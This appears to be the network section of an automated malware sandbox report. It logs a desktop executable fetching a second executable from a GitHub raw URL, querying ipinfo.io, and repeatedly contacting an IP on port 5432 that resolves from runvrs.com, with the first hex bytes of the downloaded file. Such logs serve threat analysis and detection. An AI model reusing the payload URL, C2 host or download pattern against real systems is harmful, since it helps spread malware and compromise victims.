                        Aug 21, 2024 09:41:14.498034954 CEST638035432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.502844095 CEST54326380338.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:14.674902916 CEST54326380338.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:14.675065041 CEST638035432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.675086021 CEST638035432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.679929972 CEST54326380338.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:14.680790901 CEST638035432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.685772896 CEST54326380338.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:14.685816050 CEST638035432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.823451042 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.829523087 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:14.829646111 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.829750061 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:14.836129904 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.456186056 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.457978964 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:15.462825060 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.631982088 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.632730007 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:15.637542963 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.808913946 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.808928013 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.808976889 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:15.809875965 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:15.809954882 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:15.814728022 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.814739943 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.984637022 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:15.984903097 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:15.989784002 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:16.158972025 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:16.165360928 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:16.170258045 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:16.340646982 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:16.385396004 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:19.557925940 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:19.562782049 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:19.731759071 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:19.731997013 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:19.736793041 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:19.907238007 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:19.907447100 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:19.912307024 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.081377983 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.081526041 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:20.086318970 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.255724907 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.255950928 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:20.260879993 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.430466890 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.430835962 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:20.435687065 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.606966972 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.610964060 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:20.615740061 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.784496069 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.792521000 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:20.797455072 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.971067905 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:20.971327066 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:20.977161884 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.145302057 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.148957014 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.149175882 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.153841972 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.154043913 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.160856009 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.166112900 CEST54326380438.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.166201115 CEST638045432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.293040037 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.297979116 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.299850941 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.299910069 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.304730892 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.921777010 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:21.923717022 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:21.928591967 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.195628881 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.195988894 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:22.200717926 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.372262001 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.372288942 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.372416019 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:22.377283096 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:22.377353907 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:22.382065058 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.382112980 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.552846909 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.553087950 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:22.557904005 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.727073908 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.732903004 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:22.737998962 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.909190893 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:22.963526011 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:26.075067043 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:26.080034018 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.253649950 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.254045010 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:26.258910894 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.430179119 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.431919098 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:26.437738895 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.607649088 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.608129025 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:26.613677979 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.783262968 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.783531904 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:26.788403034 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.958853006 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:26.960726023 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:26.965559959 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.135920048 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.136133909 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.140964031 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.310790062 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.310981989 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.315825939 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.485703945 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.485991001 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.490886927 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.660676003 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.660837889 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.660862923 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.665765047 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.667550087 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.672693968 CEST54326380538.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.672744989 CEST638055432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.792984009 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.797893047 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:27.797998905 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.807337046 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:27.812210083 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.612189054 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.613615990 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:28.618403912 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.789192915 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.789555073 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:28.794663906 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.966909885 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.966927052 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.967011929 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:28.967874050 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:28.967986107 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:28.972708941 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:28.972731113 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:29.146122932 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:29.146382093 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:29.151372910 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:29.321120977 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:29.341535091 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:29.346417904 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:29.518021107 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:29.572900057 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:32.948765039 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:32.953815937 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.124615908 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.124917030 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:33.129945040 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.304610968 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.305006027 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:33.313011885 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.625349045 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.625653982 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:33.630485058 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.800662041 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.801004887 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:33.806030035 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.976840973 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:33.977026939 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:33.982089996 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.153532028 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.153793097 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.159394026 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.329176903 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.329571962 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.334439039 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.507661104 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.507838964 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.512820005 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.682847023 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.683072090 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.683072090 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.688043118 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.688055038 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.689143896 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.694189072 CEST54326380638.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.694264889 CEST638065432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.811228037 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.816164970 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:34.816265106 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.816312075 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:34.821129084 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.421821117 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.423249960 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:35.428807974 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.596126080 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.597565889 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:35.604516983 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.774507999 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.774524927 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.774593115 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:35.775315046 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:35.775422096 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:35.780108929 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.780136108 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.948158026 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:35.948388100 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:35.953259945 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:36.122383118 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:36.128427029 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:36.134680033 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:36.303561926 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:36.354160070 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:39.479716063 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:39.484724045 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:39.652616024 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:39.652791977 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:39.657558918 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:39.827073097 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:39.827306032 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:39.832123995 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:39.999022961 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:39.999186039 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.004592896 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.171308994 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.171565056 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.176388979 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.344005108 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.344322920 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.349111080 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.516645908 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.516812086 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.521594048 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.688541889 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.700628042 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.705598116 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.872904062 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.873918056 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.878813982 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.045769930 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.048970938 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.048994064 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.053968906 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.054022074 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.067095041 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.072473049 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.072536945 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.183468103 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.188342094 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.188441038 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.188570023 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.193308115 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.805054903 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.806515932 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.811444998 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.980593920 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.983573914 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.988478899 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.160198927 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.160217047 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.160269022 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.160999060 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.161056042 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.166824102 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.166950941 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.337044954 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.337224960 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.342053890 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.510914087 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.516935110 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.521863937 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.693691969 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.744781017 CEST638085432192.168.2.638.180.213.183

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 21, 2024 09:39:37.703120947 CEST6137953192.168.2.61.1.1.1
                        Aug 21, 2024 09:39:51.644015074 CEST5705653192.168.2.61.1.1.1
                        Aug 21, 2024 09:39:51.652582884 CEST53570561.1.1.1192.168.2.6
                        Aug 21, 2024 09:40:27.104036093 CEST5205153192.168.2.61.1.1.1
                        Aug 21, 2024 09:40:27.111253977 CEST53520511.1.1.1192.168.2.6
                        Aug 21, 2024 09:40:36.366151094 CEST5650753192.168.2.61.1.1.1
                        Aug 21, 2024 09:40:36.551551104 CEST53565071.1.1.1192.168.2.6
                        Aug 21, 2024 09:40:41.750860929 CEST6535653192.168.2.61.1.1.1
                        Aug 21, 2024 09:40:41.757498026 CEST53653561.1.1.1192.168.2.6

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Aug 21, 2024 09:39:37.703120947 CEST192.168.2.61.1.1.10x7600Standard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false
                        Aug 21, 2024 09:39:51.644015074 CEST192.168.2.61.1.1.10xd9f0Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                        Aug 21, 2024 09:40:27.104036093 CEST192.168.2.61.1.1.10x7fe6Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                        Aug 21, 2024 09:40:36.366151094 CEST192.168.2.61.1.1.10x768Standard query (0)runvrs.comA (IP address)IN (0x0001)false
                        Aug 21, 2024 09:40:41.750860929 CEST192.168.2.61.1.1.10xac20Standard query (0)github.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Aug 21, 2024 09:39:37.712625027 CEST1.1.1.1192.168.2.60x7600No error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                        Aug 21, 2024 09:39:37.712625027 CEST1.1.1.1192.168.2.60x7600No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:39:37.712625027 CEST1.1.1.1192.168.2.60x7600No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:39:51.652582884 CEST1.1.1.1192.168.2.60xd9f0No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:39:51.652582884 CEST1.1.1.1192.168.2.60xd9f0No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:39:51.652582884 CEST1.1.1.1192.168.2.60xd9f0No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:39:51.652582884 CEST1.1.1.1192.168.2.60xd9f0No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:40:27.111253977 CEST1.1.1.1192.168.2.60x7fe6No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:40:36.551551104 CEST1.1.1.1192.168.2.60x768No error (0)runvrs.com38.180.213.183A (IP address)IN (0x0001)false
                        Aug 21, 2024 09:40:41.757498026 CEST1.1.1.1192.168.2.60xac20No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • raw.githubusercontent.com

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.663778185.199.108.1334433552C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        TimestampBytes transferredDirectionData
                        2024-08-21 07:39:52 UTC348OUTGET /panchitopistolesx/items/main/hardsvcupdt.exe HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        2024-08-21 07:39:52 UTC899INHTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 15180800
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: application/octet-stream
                        ETag: "d1a7de94421ac17b8fcb2e241080e66ee0f4b7510936df7f54af190aa7c459ba"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: F803:A456A:59CC:719F:66C599C1
                        Accept-Ranges: bytes
                        Date: Wed, 21 Aug 2024 07:39:52 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-nyc-kteb1890094-NYC
                        X-Cache: MISS
                        X-Cache-Hits: 0
                        X-Timer: S1724225992.254248,VS0,VE119
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: 46d903d420360c7edc1b70621e3809785949ac6b
                        Expires: Wed, 21 Aug 2024 07:44:52 GMT
                        Source-Age: 0
                        2024-08-21 07:39:52 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 89 cc eb 6c cd ad 85 3f cd ad 85 3f cd ad 85 3f bd 2c 80 3e 60 ad 85 3f bd 2c 81 3e df ad 85 3f bd 2c 86 3e cb ad 85 3f dd 29 86 3e c7 ad 85 3f dd 29 81 3e dd ad 85 3f dd 29 80 3e 9a ad 85 3f bd 2c 84 3e c8 ad 85 3f cd ad 84 3f 56 ad 85 3f 85 28 8c 3e cc ad 85 3f 85 28 7a 3f cc ad 85 3f 85 28 87 3e cc ad 85 3f 52 69 63 68 cd ad 85 3f 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07
